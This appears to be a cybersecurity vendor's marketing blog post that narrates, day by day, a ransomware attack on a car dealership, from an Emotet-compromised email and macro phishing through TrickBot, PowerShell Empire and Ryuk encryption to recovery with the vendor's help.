The Timeline of a Ransomware Attack

Why are dealerships facing more cyberattacks than ever before? We’re living in a world that runs on data — a whole lot of it. Every day, more than 400 billion gigabytes are created online. That’s roughly 1.7 megabytes per second, per person.  

Amazing? Yes.  

Dangerous? Also, yes.

While we’re enjoying immediate access to pretty much everything, the bad guys are too. Cybercriminals are collecting our data just as fast as we create it. 

One of the bad guys’ go-to tools is called ransomware. This malware locks out your entire system and demands a payment to give your access and your data back.  

Setting Up the Attack

Like many attacks, this one began in the shadows. A billing clerk’s email was quietly compromised by Emotet, a stealthy malware platform built to spy, collect data, and pave the way for something much worse. 

It lived undetected within the dealership’s systems for 90 days, harvesting everything it could. No one had any idea, but how could they? The platform was designed to stay hidden and stay silent. 

Day One: The Phish

Just before 5 p.m., the finance manager received an email from the billing clerk. It seemed to be rather harmless; the subject line and sender name looked identical to prior communications. Unfortunately, this was no ordinary message.  

Hiding in plain sight, the attackers created a phishing email using the Adversary in the Middle technique. The email contained a Word document that executed a malicious macro when launched. Within ten minutes, trickbot malware infected the network and spread fast, digging into credentials, point-of-sale systems, and sensitive financial data. 

All undetected. 

Day Two: The Invasion

This wasn’t an in-and-out operation. It was a full-scale, stealth invasion. The attackers moved laterally through the network, wiping out backups and encrypting critical systems. The goal was to cause as much chaos as possible, leaving everything in utter destruction. 

Day Three: The Lockdown

The invasion went off without a hitch. With the networks left completely vulnerable, it was time to activate the kill switch, PowerShell Empire. This launched across the domain and encrypted most of the infrastructure using the RYUK framework to ensure immediate recovery would be impossible. In a matter of hours, only four of the 29 servers were left standing.

Day Four: The Fallout

Employees walked in to start their day and were greeted by darkness. Screens were either completely down or displayed a single word: Ryuk. The DMS was gone, as was access to customer records, ROs, and deals. Operations hadn’t just slowed down — they were completely halted.

Day Five: The Response

All internal options had been exhausted, it was time to call for help. Enter Proton. Containment began immediately. Within just 36 hours, the Proton response team delivered and installed over 100 new PCs, allowing operations to resume once again.

This story ends in a recovery, but everything could have been prevented before it began. The attack started months prior with a single compromised email. That’s not a tech error; it’s a human one. Don’t wait until it’s your final option. Ensure that you’re in control of your cybersecurity now.  

Train your team, test your systems, and think proactively about your security plan. If your dealership is hit by ransomware, the warning signs may not present themselves, but the ransom note sure will.